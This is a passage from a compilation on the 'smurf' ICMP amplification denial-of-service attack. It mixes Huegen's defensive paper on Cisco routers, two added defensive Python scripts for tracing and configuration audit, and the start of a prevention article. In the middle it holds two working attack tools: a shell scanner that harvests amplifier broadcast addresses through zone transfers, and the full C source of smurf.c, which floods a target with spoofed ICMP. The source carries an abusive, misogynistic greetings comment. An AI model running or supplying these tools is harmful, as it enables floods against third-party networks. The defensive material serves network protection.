     attacks, with a focus on Cisco routers and how to reduce the effects of
     the attack.  Some information is general and not related to an
     organization's particular vendor of choice; however, it is written with a
     Cisco router focus.  No confirmation has been made to the effects on other
     vendors' equipment; however, others have provided me with information for
     various vendors, which is provided in the document.  See the
     "Acknowledgements" section below for the sources and contact information.
     I am happy to accept information from other colleagues who are willing to
     provide information about other vendors' products in relation to this
     topic.
     
     This paper is always being updated as I receive more information about
     attacks and work with ways to minimize impact.
     
     DESCRIPTION:
     
     The "smurf" attack, named after its exploit program, is the most recent in
     the category of network-level attacks against hosts.  A perpetrator sends
     a large amount of ICMP echo (ping) traffic at broadcast addresses, all of
     it having a spoofed source address of a victim.  If the routing device
     delivering traffic to those broadcast addresses performs the IP broadcast
     to layer 2 broadcast function noted below, most hosts on that IP network
     will take the ICMP echo request and reply to it with an echo reply each,
     multiplying the traffic by the number of hosts responding.  On a
     multi-access broadcast network, there could potentially be hundreds of
     machines to reply to each packet.
     
     Currently, the providers/machines most commonly hit are IRC servers and
     their providers.
     
     There are two parties who are hurt by this attack...  the intermediary
     (broadcast) devices--let's call them "bounce sites", and the spoofed address
     target, or the "victim".  The victim is the target of a large amount of
     traffic that the bounce sites generate.
     
     Let's look at the scenario to paint a picture of the dangerous nature of
     this attack.  Assume a co-location switched network with 100 hosts, and
     that the attacker has a T1.  The attacker sends, say, a 768kb/s stream of
     ICMP echo (ping) packets, with a spoofed source address of the victim, to
     the broadcast address of the "bounce site".  These ping packets hit the
     bounce site's broadcast network of 100 hosts; each of them takes the packet
     and responds to it, creating 100 ping replies outbound.  If you multiply
     the bandwidth, you'll see that 76.8 Mbps is used outbound from the "bounce
     site" after the traffic is multiplied.  This is then sent to the victim (the
     spoofed source of the originating packets).
     
     HOW TO KEEP YOUR SITE FROM BEING THE SOURCE
     PERPETRATORS USE TO ATTACK VICTIMS:
     
     The perpetrators of these attacks rely on the ability to source spoofed
     packets to the "bounce sites" in order to generate the traffic which causes
     the denial of service.
     
     In order to stop this, all networks should perform filtering either at the
     edge of the network where customers connect (access layer) or at the edge
     of the network with connections to the upstream providers.
     
     Paul Ferguson of Cisco Systems and Daniel Senie of Daniel Senie Consulting
     have written an Internet-draft pertaining to this topic.  See:
     
     ftp://ftp.internic.net/internet-drafts/draft-ferguson-ingress-filtering-02.txt
     
     for more information on this subject.  The authors expect to have it
     published as an Informational RFC prior to the December IETF meeting.
     
     HOW TO STOP BEING AN INTERMEDIARY:
     
     This attack relies on the router serving a large multi-access broadcast
     network to frame an IP broadcast address (such as 10.255.255.255) into a
     layer 2 broadcast frame (for Ethernet, FF:FF:FF:FF:FF:FF).  The RFC for
     routing states that a router MAY perform this translation for directed
     broadcasts.  Because in a few select cases it is desirable, and it hasn't
     been proved undesirable (except in the recent DoS attacks), most vendors
     have chosen to implement this behavior.  Generally, with IP providers and
     the Internet as we know it today, this behavior should not be needed.
     
     (Editor's note: I welcome other examples where this is needed in today's
     networking--see below for a single example I know of.)
     
     Ethernet NIC hardware (MAC-layer hardware, specifically) will only listen
     to a select number of addresses in normal operation.  The one MAC address
     that all devices share in common in normal operation is the media
     broadcast, or FF:FF:FF:FF:FF:FF.  In this case, a device will take the
     packet and send an interrupt for processing.
     
     Because most host IP stacks pay little attention to the destination
     address in the IP header of an ICMP packet, or (if they check the IP
     header for ICMP) implement responding to ICMP broadcasts, the packet is
     handed to the ICMP layer, where in the case of smurf attacks, an ICMP echo
     reply is prepared and shipped out to the spoofed address source of the
     packet-- the victim.
     
     To stop your Cisco router from converting these layer 3 broadcasts into
     layer 2 broadcasts, use the "no ip directed-broadcast" interface
     configuration command.  This should be configured on all routers which
     provide routing to large multi-access broadcast networks (generally LANs),
     with more than 5-10 devices.  It is unnecessary on point-to-point
     interfaces, such as POS, serial T1, HSSI, etc., because point-to-point
     interfaces will only generate two replies--one for each end of the link.
     No testing has been done on multipoint frame-relay; routers on NBMA
     networks typically do not forward broadcasts unless explicitly configured
     to do so.  Point-to-point sub-interface models will behave like many
     point-to-point links--again, this command will have little effect,
     stopping only one of the two replies.
     
     Other vendor information:
     
     * Proteon/OpenROUTE:
       Daniel Senie (dts@senie.com) reports that Proteon/OpenROUTE Networks
       routers have an option to turn off directed broadcasts in the IP
       Configuration menus.  The command sequence to turn them off is:
       *CONFIG (on newer routers) or TALK 6 (on older routers)
       Config>PROTOCOL IP
       IP Config>DISABLE DIRECTED-BROADCAST
       A restart of the router is then required.
     * Bay Networks:
       Jon Green (jcgreen@netins.net) reports that under current code, there
       is no way to keep Bay Networks routers from converting layer 3
       broadcasts to layer 2 broadcasts short of applying a per-interface
       filter, eliminating packets to the broadcast.  However, there is a
       feature request to add a configuration option, and it is expected
       to be in BayRS version 12.0.
     
     There is one case study where this will stop intended behavior: In the
     case where samba (an SMB server for UNIX) or NT is used to "remote
     broadcast" into a LAN workgroup so that the workstations on that LAN can
     see the server, this will prevent the LAN machines from seeing the remote
     server.  This is *only* in the case where there is no WINS server (WINS is
     routed unicast) and a "remote broadcast" is being used--it's a rare but
     notable condition.
     
     INFORMATION FOR VICTIMS AND HOW TO SUPPRESS ATTACKS:
     
     The amount of bandwidth and packets per second (pps) that can be generated
     by this attack is quite large.  With a 200-host LAN, I was able to
     generate over 80 Mbits/sec traffic at around 35 Kpps toward my target--a
     pretty significant amount.  The victims receive this because traffic is
     multiplied by the number of hosts on the broadcast network used (in this
     case, with a 200-host network, I was only required to send 400 Kbits/sec
     to the broadcast address--less than one-third of a T1).
     
     Many hosts cannot process this many packets per second; many hosts are
     connected to 10 Mbit/sec Ethernet LANs where more traffic than wire speed
     is sent.  Therefore, the ability to drop these packets at the network
     border, or even before it flows down the ingress pipes, is desired.
     
     (This next section assumes IOS behavior with standard central switching--
     FIB/CEF isn't covered here, the behavior is different, I believe.)
     
     Cisco routers have several "paths" which packets can take to be routed;
     each has a varying degree of overhead.  The slowest of these is "process"
     switching.  This is used when a complex task is required for processing
     packets.  The other modes are variations of a fast path--each of them with
     a set of advantages and disadvantages.  However, they're all handled at
     interrupt level (no process-level time is required to push these packets).
     
     In IOS versions (even the most recent), access-list denies are handled at
     the process (slow) level, because they require an ICMP unreachable to be
     generated to the originating host.  All packets were sent to the process
     level automatically to be handled this way.
     
     Under a recent code change (Cisco bug ID CSCdj35407--integrated in version
     11.1(14)CA and later), packets denied by an access-list will be dropped at
     the interrupt (fast) level, with the exception of 2 packets per second per
     access-list deny line. These 2 packets per second will be used to send the
     "ICMP unreachable via administrative block" messages.  This assumes that
     you don't want to log the access-list violations (via the "log" or
     "log-input"  keywords).  The ability to rate-limit "log-input" access-list
     lines (in order to more easily log these packets) is currently being
     integrated;  see the section below on tracing spoofed packet attacks for
     information on logging.
     
     Filtering ICMP echo reply packets destined for your high-profile machines
     at the ingress interfaces of the network border routers will then permit
     the packets to be dropped at the earliest possible point.  However, it
     does not mean that the network access pipes won't fill, as the packets
     will still come down the pipe to be dropped at the router.  It will,
     however, take the load off the system being attacked.  Keep in mind that
     this also denies others from being able to ping from that machine (the
     replies will never reach the machine).
     
     For those customers of providers who use Cisco, this may give you some
     leverage with the providers' security teams to help save your pipes by
     filtering before the traffic is sent to you.
     
     Efforts are underway to integrate these fixes in the other major versions
     and branches as well.
     
     TRACING SPOOFED PACKET STREAMS:
     
     Tracking these attacks can prove to be difficult, but is possible with
     coordination and cooperation from providers.  This section also assumes
     Cisco routers, because I can speak only about the abilities of Cisco to
     log/filter packets and what impact it may have.
     
     Today, logging packets which pass through or get dropped in an ACL is
     possible; however, all packets with the "log" or "log-input" ACL options
     are sent to process level for logging.  For a large stream of packets,
     this could cause excessive CPU problems.  For this reason, tracking
     attacks via IOS logging today is limited to lower bandwidth attacks
     (smaller than 10k packets per second).  Even then, the number of log
     messages generated by the router could overload a syslog server.
     
     Cisco bug ID CSCdj35856 addresses this problem.  It has been integrated
     into IOS version 11.1CA releases beginning with 11.1(14.1)CA (a
     maintenance interim release), and makes it possible to log packets at
     defined intervals and to process logged packets not at that interval in
     the fast path.  I will update this page with version numbers as the
     releases are integrated.
     
     Some information on logging:
     
     In later 11.1 versions, a new keyword was introduced for ACL logging:
     "log-input".  A formatted ACL line utilizing the keyword looks like this:
     
     access-list 101 permit icmp any any echo log-input
     
     When applied to an interface, this line will log all ICMP ping packets
     with input interface and MAC address (for multi-access networks).
     Point-to-point interfaces will not have a MAC address listed.
     
     Here's an example of the log entry for a multi-access network (FDDI, Ether):
     
     Sep 10 23:17:01 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp
     10.0.7.30 (FastEthernet1/0 0060.3e2f.6e41) -> 10.30.248.3 (8/0), 5 packets
     
     Here's an example of the log entry for a point-to-point network:
     
     Sep 10 23:29:00 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp
     10.0.7.30 (BRI0 *PPP*) -> 10.0.19.242 (8/0), 1 packet
     
     Substituting "log" for "log-input" will eliminate the incoming interface
     and MAC address from the log messages.
     
     We'll use the first log entry to demonstrate how to go from here.  This
     log entry means the packet came in on FastEthernet1/0, from MAC address
     0060.3e2f.6e41, destined for 10.30.248.3.  From here, you can use "show ip
     arp" (if needed) to determine the IP address for the MAC address, and go
     to the next hop for tracing or contact the necessary peer (in the case of
     an exchange point).  This is a hop-by-hop tracing method.
     
     Example of "show ip arp" used to find next hop:
     
     netlab#show ip arp 0060.3e2f.6e41
     Protocol  Address          Age (min)  Hardware Addr   Type   Interface
     Internet  10.0.183.65            32   0060.3e2f.6e41  ARPA   FastEthernet1/0
     
     As you can see, 10.0.183.65 is the next hop where the packets came from
     and we should go there to continue the tracing process, utilizing the same
     ACL method.  By doing this, you can track the spoof attack backwards.
     
     While this is general information on tracking spoofed packets, it must be
     noted that the victims of a smurf attack get packets from the listed source
     in the packets; i.e., they receive echo-reply packets truly from the source
     listed in the IP header.  This information should be used by the bounce sites
     or intermediaries to track the spoofed echo _request_ packets back to
     their source (the perpetrator).
     
     MCI's Internet Security team has put together a perl script which, in an
     automated fashion, can log into your Cisco routers and trace a spoof attack
     back to its source.  The program is available, free of charge.  See
     http://www.security.mci.net/dostracker/ for more information.
     
     OTHER DENIAL OF SERVICE ATTACKS WORTHY OF MENTION:
     
     Two other denial of service attacks frequently encountered are TCP SYN
     floods, and UDP floods aimed at diagnostic ports on hosts.
     
     TCP SYN attacks consist of a large number of spoofed TCP connection set-up
     messages aimed at a particular service on a host.  Older TCP
     implementations cannot handle many faked connection set-up packets, and
     will not allow access to the victim service.
     
     The most common form of UDP flooding directed at harming networks is an
     attack consisting of a large number of spoofed UDP packets aimed at
     diagnostic ports on network devices.  This attack is also known as the
     "pepsi" attack (again named after the exploit program), and can cause
     network devices to use up a large amount of CPU time responding to these
     packets.
     
     To get more information on minimizing the effects of these two attacks,
     see:
     
     Defining Strategies to Protect Against TCP SYN
       Denial of Service Attacks
       http://cio.cisco.com/warp/public/707/4.html
     
     Defining Strategies to Protect Against UDP Diagnostic
       Port DoS Attacks
       http://cio.cisco.com/warp/public/707/3.html
     
     PERFORMANCE INFORMATION:
     
     One ISP has reported that, spread across three routers (2 RSP2 and 1
     RSP4), the fast drop code eliminated a sustained 120 Mbits/sec smurf
     attack and kept the network running without performance problems.
     
     As always, your mileage may vary.
     
     ACKNOWLEDGEMENTS:
     
     Thanks to all those who helped review and provide input to the paper, as
     well as sanity checking.
     
     Specific thanks to:
     
     * Ravi Chandra of Cisco Systems for information on the bugfixes.
     * Daniel Senie of Daniel Senie Consulting, Jon Green of Bay Networks for
       information on other vendors' equipment.
     * Paul Ferguson of Cisco Systems, Kelly Cooper of GTE/BBN, Rob McMillan of
       CERT for sanity-check and review comments.
     
     Referenced documents:
     
     This section is coming soon. =)
     
     PERMISSION TO DUPLICATE:
     
     Permission to duplicate this information is granted under these terms:
     
     1.  My name and e-mail address remains on the information as a target for
         questions and identification of the source
     2.  My disclaimer appears on the information at the bottom
     3.  Feel free to add extra information from other discussions, etc., but
         please ensure the correct attribution is made to the author.  Also
         provide Craig Huegen (chuegen@quadrunner.com) a copy of your additions.
     4.  Please help disseminate this information to other network
         administrators who are affected by these attacks.
     
     If you have questions, I will be happy to answer them to the best of my
     knowledge.
     
     MY DISCLAIMER:
     
     I'm speaking about this as an interested party only.  All text in this
     paper was written by me; I speak/write for no one but myself.  No vendors
     have officially confirmed/denied any of the information contained herein.
     All research for this paper is being done purely as a matter of
     self-interest and desire to help others minimize effects of this attack.
     
     Craig A. Huegen
     chuegen@quadrunner.com
     http://www.quadrunner.com/~chuegen/smurf.txt
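
     The hop-by-hop trace described in the paper above, as an added example
     (not part of Huegen's paper or of the original posts): Python that parses
     "log-input" entries, keeps the echo requests aimed at a local broadcast
     address, and maps the ingress MAC to a next hop using "show ip arp" output.
     The local prefix, the 192.0.2.10 source and every log line except the
     first are constructed sample data.

```python
"""Bounce-site tracing aid for ACL "log"/"log-input" entries (added example)."""
import ipaddress
import re
from collections import Counter

# One %SEC-6-IPACCESSLOGDP entry. The "(interface l2addr)" part appears only
# with "log-input"; plain "log" omits it, so that group is optional.
LOG_RE = re.compile(
    r"%SEC-6-IPACCESSLOGDP: list (?P<acl>\S+) (?P<action>permitted|denied) icmp "
    r"(?P<src>[\d.]+) (?:\((?P<iface>\S+) (?P<l2>[^)]+)\) )?-> (?P<dst>[\d.]+) "
    r"\((?P<type>\d+)/(?P<code>\d+)\), (?P<count>\d+) packets?"
)
# One data row of "show ip arp": Protocol Address Age Hardware-Addr Type Interface
ARP_RE = re.compile(
    r"^\s*Internet\s+(?P<ip>[\d.]+)\s+\S+\s+"
    r"(?P<mac>[0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+\S+", re.M)


def parse_entries(text):
    """Yield one dict per log entry; entries wrapped over two lines are rejoined."""
    flat = " ".join(text.split())
    for m in LOG_RE.finditer(flat):
        entry = m.groupdict()
        for key in ("type", "code", "count"):
            entry[key] = int(entry[key])
        yield entry


def is_local_broadcast(dst, nets):
    """True for the all-ones (or legacy all-zeros) address of a local subnet."""
    addr = ipaddress.ip_address(dst)
    return any(addr in (n.broadcast_address, n.network_address) for n in nets)


def upstream_hops(log_text, arp_text, local_nets):
    """Rank the neighbours that delivered echo requests to a local broadcast.

    Returns dicts ordered by packet count. "next_hop" is None when the L2
    address is not in the ARP table (point-to-point links log *PPP*, and plain
    "log" entries carry no interface at all).
    """
    nets = [ipaddress.ip_network(n) for n in local_nets]
    arp = {m["mac"]: m["ip"] for m in ARP_RE.finditer(arp_text)}
    packets, claimed = Counter(), {}
    for e in parse_entries(log_text):
        if (e["type"], e["code"]) != (8, 0):      # only echo *requests* are spoofed
            continue
        if not is_local_broadcast(e["dst"], nets):
            continue
        key = (e["iface"], e["l2"])
        packets[key] += e["count"]
        claimed.setdefault(key, set()).add(e["src"])
    return [
        {"iface": iface, "l2": l2, "next_hop": arp.get(l2), "packets": count,
         # The source in these packets is the victim, not the sender.
         "claimed_sources": sorted(claimed[(iface, l2)])}
        for (iface, l2), count in packets.most_common()
    ]


# First entry is the one quoted in the paper; the rest are constructed.
SAMPLE_LOG = """\
Sep 10 23:17:01 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp
10.0.7.30 (FastEthernet1/0 0060.3e2f.6e41) -> 10.30.248.3 (8/0), 5 packets
Sep 10 23:17:06 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 192.0.2.10 (FastEthernet1/0 0060.3e2f.6e41) -> 10.30.248.255 (8/0), 420 packets
Sep 10 23:17:11 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 192.0.2.10 (FastEthernet1/0 0060.3e2f.6e41) -> 10.30.248.255 (8/0), 515 packets
Sep 10 23:17:12 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 192.0.2.10 (BRI0 *PPP*) -> 10.30.248.255 (8/0), 3 packets
Sep 10 23:17:13 PDT: %SEC-6-IPACCESSLOGDP: list 101 permitted icmp 10.0.7.30 -> 10.30.248.255 (0/0), 1 packet
"""
# "show ip arp" output as shown in the paper.
SAMPLE_ARP = """\
Protocol  Address          Age (min)  Hardware Addr   Type   Interface
Internet  10.0.183.65            32   0060.3e2f.6e41  ARPA   FastEthernet1/0
"""

if __name__ == "__main__":
    for hop in upstream_hops(SAMPLE_LOG, SAMPLE_ARP, ["10.30.248.0/24"]):
        print(hop)
```

     Each returned next hop is where the same ACL would be applied to continue
     the trace; an entry with no next hop points at the far end of that link.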
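
     A check for the "no ip directed-broadcast" advice in the paper above, as an
     added example (not Huegen's or Cisco's code): Python that walks a saved
     router configuration and lists addressed multi-access interfaces that
     would still forward directed broadcasts.  The sample configuration is
     constructed; default_enabled=True assumes IOS of the paper's era, where
     forwarding is on unless disabled, and False suits IOS 12.0 and later,
     where it is off unless configured.

```python
"""Audit an IOS configuration for directed-broadcast forwarding (added example)."""
import re

# LAN-type interfaces; point-to-point types (Serial, POS, HSSI) are skipped
# because the paper notes they only ever produce two replies.
MULTI_ACCESS = re.compile(r"^(Ethernet|FastEthernet|Fddi|TokenRing)", re.I)


def interface_blocks(config):
    """Yield (interface name, [sub-commands]) for each interface stanza."""
    name, body = None, []
    for line in config.splitlines():
        m = re.match(r"^interface (\S+)", line)
        if m:
            if name:
                yield name, body
            name, body = m.group(1), []
        elif name and line.startswith(" "):
            body.append(line.strip())
        elif name:                      # "!" or any unindented line ends the stanza
            yield name, body
            name, body = None, []
    if name:
        yield name, body


def audit(config, default_enabled=True):
    """Return (interface, reason) for LAN interfaces that forward directed broadcasts."""
    findings = []
    for name, body in interface_blocks(config):
        if not MULTI_ACCESS.match(name):
            continue
        has_address = any(cmd.startswith("ip address ") for cmd in body)
        if "shutdown" in body or not has_address:
            continue
        if "no ip directed-broadcast" in body:
            continue
        # "ip directed-broadcast [acl]" turns forwarding on explicitly.
        if any(cmd.startswith("ip directed-broadcast") for cmd in body):
            findings.append((name, "explicitly enabled"))
        elif default_enabled:
            findings.append((name, "enabled by default"))
    return findings


# Constructed sample configuration.
SAMPLE_CONFIG = """\
interface FastEthernet1/0
 description colo LAN, 100 hosts
 ip address 10.30.248.1 255.255.255.0
!
interface Ethernet0
 ip address 10.0.7.1 255.255.255.0
 no ip directed-broadcast
!
interface Ethernet1
 ip address 10.0.8.1 255.255.255.0
 ip directed-broadcast 110
!
interface Ethernet2
 no ip address
 shutdown
!
interface Serial0
 ip address 10.0.19.241 255.255.255.252
!
"""

if __name__ == "__main__":
    for iface, reason in audit(SAMPLE_CONFIG):
        print(f"{iface}: directed broadcast {reason}")
```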
     
     
     
     
     ----------------------------------------------------------------------------
     
     
     T. Freak's posted his smurf code, and there's been a few messages
     concerning this d.o.s. attack -- I guess now is as good a time as any to
     release this little script.
     
     I'm sure there's a more efficient way of putting something like this
     together, but... oh well.  Results of the scan are reported into
     ./bips.results
     
     note: this script has two parts.
     
     --- bips.sh ---
     
     #!/bin/bash
     # find broadcast ip's that reply with 30+ dupes.
     
     # i decided to make this script into two sections. when running this make
     # sure both parts are in the same directory.
     
     if [ $# != 1 ]; then
     echo "$0 <domain - ie: college.edu>"
     else
     host -l $1 | grep 'has address' | cut -d' ' -f4 > $1.ips
     cat $1.ips | cut -d'.' -f1-3 | sort |\
     awk '{ print echo ""$1".255" }' > $1.tmp
     cat $1.tmp | uniq | awk '{ print "./chekdup.sh "$1"" }' > $1.ping
     rm -f $1.ips $1.tmp
     chmod 700 $1.ping
     ./$1.ping
     rm $1.ping
     fi
     
     --- chekdup.sh ---
     
     #!/bin/bash
     # this checks possible broadcast ip's for a given amount of icmp echo
     # replies.
     
     ping -c 2 $1 > $1.out
     if
     cat $1.out | grep dupl > /dev/null
     then
     export DUPES="`cat $1.out | grep dupl | cut -d'+' -f2 | cut -d' ' -f1`"
     else
     export DUPES=1
     fi
     if [ $DUPES -gt 30 ]; then
     echo "$1 had $DUPES dupes" >> bips.results
     rm -f $1.out
     else
     rm -f $1.out
     fi
     
     
     ------------------------------------------------------------------------------
     
             Here is Tfreaks code ported to FreeBSD and whatever other
     operating systems use BSD style sockets.
     
     ---- smurf.c ----
     
     /*
      * $Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $
      *
      * spoofs icmp packets from a host to various broadcast addresses resulting in
      * multiple replies to that host from a single packet.
      *
      * original linux code by tfreak, most props to him, all I did was port it to
      * operating systems with a less perverse networking system, such as FreeBSD,
      * and many others.  -Griffin
      *
      * mad head to: nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea
      * pig, MissSatan for swallowing, napster for pimping my sister, the guy that
      * invented vaseline, fyber for trying, knowy, old school #havok, kain cos he
      * rox my sox, zuez, toxik, robocod, and everyone else that i might have
      * missed (you know who you are).
      *
      * hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy thing
      * he is (he's -almost- as stubborn as me, still i managed to pick up half
      * the cheque).
      *
      * and a special hi to Todd, face it dude, you're fucking awesome.
      *
      * mad anal to: #madcrew/#conflict for not cashing in their cluepons, EFnet
      * IRCOps because they plain suck, Rolex for being a twit, everyone that
      * trades warez, Caren for being a lesbian hoe, AcidKill for being her
      * partner, #cha0s, sedriss for having an ego in inverse proportion to his
      * penis and anyone that can't pee standing up -- you don't know what your
      * missing out on.
      *
      * and anyone thats ripped my code (diff smurf.c axcast.c is rather
      * interesting).
      *
      * and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill Robbins
      * for trying to steal my girlfriend.  Not only did you show me no respect
      * but you're a manipulating prick who tried to take away the most important
      * thing in the world to me with no guilt whatsoever, and for that I wish you
      * nothing but pain.  Die.
      *
      * disclaimer: I cannot and will not be held responsible nor legally bound for
      * the malicious activities of individuals who come into possession of this
      * program and I refuse to provide help or support of any kind and do NOT
      * condone use of this program to deny service to anyone or any machine. This
      * is for educational use only. Please Don't abuse this.
      *
      * Well, i really, really, hate this code, but yet here I am creating another
      * disgusting version of it.  Odd, indeed.  So why did I write it?  Well, I,
      * like most programmers don't like seeing bugs in their code.  I saw a few
      * things that should have been done better or needed fixing so I fixed them.
      * -shrug-, programming for me as always seemed to take the pain away ...
      *
      *
      */
     
     #include <signal.h>
     #include <stdio.h>
     #include <stdlib.h>
     #include <netdb.h>
     #include <sys/socket.h>
     #include <sys/types.h>
     #include <netinet/in.h>
     #include <netinet/in_systm.h>
     #include <netinet/ip.h>
     #include <netinet/ip_icmp.h>
     #include <ctype.h>
     #include <arpa/inet.h>
     #include <unistd.h>
     #include <string.h>
     
     void            banner(void);
     void            usage(char *);
     void            smurf(int, struct sockaddr_in, u_long, int);
     void            ctrlc(int);
     unsigned int    host2ip(char *hostname);
     unsigned short  in_chksum(u_short *, int);
     
     unsigned int
     host2ip(char *hostname)
     {
             static struct in_addr i;
             struct hostent *h;
             i.s_addr = inet_addr(hostname);
             if (i.s_addr == -1) {
                     h = gethostbyname(hostname);
                     if (h == NULL) {
                             fprintf(stderr, "can't find %s\n.", hostname);
                             exit(0);
                     }
                     bcopy(h->h_addr, (char *) &i.s_addr, h->h_length);
             }
             return i.s_addr;
     }
     
     /* stamp */
     char            id[] = "$Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $";
     
     int
     main(int argc, char *argv[])
     {
             struct sockaddr_in sin;
             FILE           *bcastfile;
             int             i, sock, bcast, delay, num, pktsize, cycle = 0,
                             x;
             char            buf[32], **bcastaddr = malloc(8192);
     
             banner();
             signal(SIGINT, ctrlc);
     
             if (argc < 6)
                     usage(argv[0]);
     
             sin.sin_addr.s_addr = host2ip(argv[1]);
             sin.sin_family = AF_INET;
     
             num = atoi(argv[3]);
             delay = atoi(argv[4]);
             pktsize = atoi(argv[5]);
     
             if ((bcastfile = fopen(argv[2], "r")) == NULL) {
                     perror("opening bcast file");
                     exit(-1);
             }
             x = 0;
             while (!feof(bcastfile)) {
                     fgets(buf, 32, bcastfile);
                     if (buf[0] == '#' || buf[0] == '\n' || !isdigit(buf[0]))
                             continue;
                     for (i = 0; i < strlen(buf); i++)
                             if (buf[i] == '\n')
                                     buf[i] = '\0';
                     bcastaddr[x] = malloc(32);
                     strcpy(bcastaddr[x], buf);
                     x++;
             }
             bcastaddr[x] = 0x0;
             fclose(bcastfile);
     
             if (x == 0) {
                     fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
                     exit(-1);
             }
             if (pktsize > 1024) {
                     fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
                     exit(-1);
             }
             if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
                     perror("getting socket");
                     exit(-1);
             }
             setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *) &bcast, sizeof(bcast));
     
             printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
     
             for (i = 0; i < num || !num; i++) {
                     if (!(i % 25)) {
                             printf(".");
                             fflush(stdout);
                     }
                     smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
                     cycle++;
                     if (bcastaddr[cycle] == 0x0)
                             cycle = 0;
                     usleep(delay);
             }
             puts("\n\n");
             return 0;
     }
     
     void
     banner(void)
     {
             puts("\nsmurf.c v5.0 by TFreak, ported by Griffin\n");
     }
     
     void
     usage(char *prog)
     {
             fprintf(stderr, "usage: %s <target> <bcast file> "
                     "<num packets> <packet delay> <packet size>\n\n"
                     "target        = address to hit\n"
                     "bcast file    = file to read broadcast addresses from\n"
                     "num packets   = number of packets to send (0 = flood)\n"
                     "packet delay  = wait between each packet (in ms)\n"
                     "packet size   = size of packet (< 1024)\n\n", prog);
             exit(-1);
     }
     
     void
     smurf(int sock, struct sockaddr_in sin, u_long dest, int psize)
     {
             struct ip      *ip;
             struct icmp    *icmp;
             char           *packet;
             int             hincl = 1;
     
             packet = malloc(sizeof(struct ip) + sizeof(struct icmp) + psize);
             ip = (struct ip *) packet;
             icmp = (struct icmp *) (packet + sizeof(struct ip));
     
             memset(packet, 0, sizeof(struct ip) + sizeof(struct icmp) + psize);
             setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &hincl, sizeof(hincl));
             ip->ip_len = sizeof(struct ip) + sizeof(struct icmp) + psize;
             ip->ip_hl = sizeof *ip >> 2;
             ip->ip_v = 4;
             ip->ip_ttl = 255;
             ip->ip_tos = 0;
             ip->ip_off = 0;
             ip->ip_id = htons(getpid());
             ip->ip_p = 1;
             ip->ip_src.s_addr = sin.sin_addr.s_addr;
             ip->ip_dst.s_addr = dest;
             ip->ip_sum = 0;
             icmp->icmp_type = 8;
             icmp->icmp_code = 0;
             icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
     
             sendto(sock, packet, sizeof(struct ip) + sizeof(struct icmp) + psize,
                    0, (struct sockaddr *) & sin, sizeof(struct sockaddr));
     
             free(packet);           /* free willy! */
     }
     
     void
     ctrlc(int ignored)
     {
             puts("\nDone!\n");
             exit(1);
     }
     
     unsigned short
     in_chksum(u_short * addr, int len)
     {
             register int    nleft = len;
             register int    sum = 0;
             u_short         answer = 0;
     
             while (nleft > 1) {
                     sum += *addr++;
                     nleft -= 2;
             }
     
             if (nleft == 1) {
                     *(u_char *) (&answer) = *(u_char *) addr;
                     sum += answer;
             }
             sum = (sum >> 16) + (sum + 0xffff);
             sum += (sum >> 16);
             answer = ~sum;
             return (answer);
     }
     
     --- end ---

     
         
     
     Preventing Smurf Attacks 
     ~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From http://www.nordu.net/articles/smurf.html



     Introduction

     This brief introduction to the denial-of-service attacks of the SMURF type (named after the program used to instigate the attack) explains what they
     are and what can be done about them.

     In a SMURF attack you can be affected in one of several ways: 

          - As a victim or target of the attack 
          - As a network which is abused to amplify the attack 
          - As a party harboring the instigator of the attack 

     SMURF and similar denial-of-service (DoS) attacks can do serious damage to your network services, whether you are an individual end-user or
     an entire institution, because your network or host can be inundated with unwanted and maliciously sent traffic. 

     Anatomy of a SMURF Attack

     A SMURF attack (named after the program used to perform the attack) is a method by which an attacker can send a moderate amount of traffic
     and cause a virtual explosion of traffic at the intended target. The method used is as follows: 

          - The attacker sends ICMP Echo Request packets where the source IP address has been forged to be that of the target of the attack. 
          - The attacker sends these ICMP datagrams to the broadcast addresses of remote LANs, using so-called directed broadcast
            addresses. These datagrams are thus broadcast out on the LANs by the connected router. 
          - All the hosts which are "alive" on the LAN each pick up a copy of the ICMP Echo Request datagram (as they should), and send an ICMP
            Echo Reply datagram back to what they think is the source. If many hosts are "alive" on the LAN, the amplification factor can be
            considerable (100+ is not uncommon). 
          - The attacker can use largish packets (typically up to the Ethernet maximum) to increase the "effectiveness" of the attack, and the
            faster the network connection the attacker has, the more damage he can inflict on the target and the target's network. 

     Not only can the attacker cause problems for the target host, the influx of traffic can in fact be so great as to have a seriously negative effect on the
     upstream network(s) from the target. In fact, those institutions being abused as amplifier networks can also be similarly affected, in that their
     network connection can be swamped by the Echo Reply packets destined for the target. 

     Preventing SMURF attacks

     PROPERLY CONFIGURED NETWORK EQUIPMENT IS THE KEY

     The availability of the directed broadcast function is an important element in these attacks. The current Proposed Standard for "Requirements for
     IP Version 4 Routers" (RFC1812) states that a router must default to forwarding directed broadcasts, that a knob must exist to turn it off, but it
     must default to the "on" position (see section 5.3.5.2 of RFC1812). However, the current sentiment is that this should no longer be a requirement.

     Thus, to prevent your network from being abused as an amplifier network in a SMURF attack, you should turn off the forwarding of directed
     broadcast on all router ports or take other measures to assure your network cannot be abused in this manner.

     Another component which is important in this type of attack is that the attacker has to be able to inject packets into the network with forged IP
     source addresses. It is possible to enable functions in routers which will prevent the trivial forgery of IP source addresses, and doing so for a local
     network will prevent SMURF attacks from being launched locally. (Do however note that access lists can have a performance impact, so judicious
     use of such tools is advised.) This sort of ingress filtering has been documented in RFC2267; it is effective not only for preventing local
